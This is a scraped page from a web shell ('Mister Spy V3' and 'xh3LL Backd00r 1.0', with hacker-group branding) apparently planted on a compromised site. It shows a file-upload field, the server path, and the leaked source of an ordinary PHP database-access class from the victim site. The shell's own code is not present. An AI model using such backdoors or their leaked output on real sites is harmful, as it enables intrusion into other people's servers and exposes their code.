Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.edicionestexto.php

<?php 

require_once('class.dbaccess.php');
require_once('class.ediciontexto.php');
require_once('class.filter.php');
require_once('class.page.php');

class EdicionesTexto extends DBAccess
{
	public function GetAll(Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEdicionesTexto";
		$sql.= " ORDER BY IdEdicion";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oEdicionTexto = new EdicionTexto();
			$oEdicionTexto->ParseFromArray($oRow);
			
			array_push($arr, $oEdicionTexto);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}
	

	public function GetById($IdEdicion)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEdicionesTexto";
		$sql.= " WHERE IdEdicion = " . DB::Number($IdEdicion);
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oEdicionTexto = new EdicionTexto();
		$oEdicionTexto->ParseFromArray($oRow);
		
		return $oEdicionTexto;		
	}
	
	
	public function Create(EdicionTexto $oEdicionTexto)
	{
		$arr = array
		(
			'IdEdicion' => DB::Number($oEdicionTexto->IdEdicion),
			'Texto' 	=> DB::String($oEdicionTexto->Texto)
		);

		if (!$this->Insert('tblEdicionesTexto', $arr))
			return false;

		return $oEdicionTexto;
	}
	
	
	public function Update(EdicionTexto $oEdicionTexto)
	{
		$where = " IdEdicion = " . DB::Number($oEdicionTexto->IdEdicion);
		
		$arr = array('Texto' => DB::String($oEdicionTexto->Texto));
		
		if (!DBAccess::UpdateEntidad('tblEdicionesTexto', $arr, $where))
			return false;
		
		return $oEdicionTexto;
	}
	

	public function Delete($IdEdicion)
	{
		$where = " IdEdicion = " . DB::Number($IdEdicion);

		if (!DBAccess::DeleteEntidad('tblEdicionesTexto', $where))
			return false;

		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat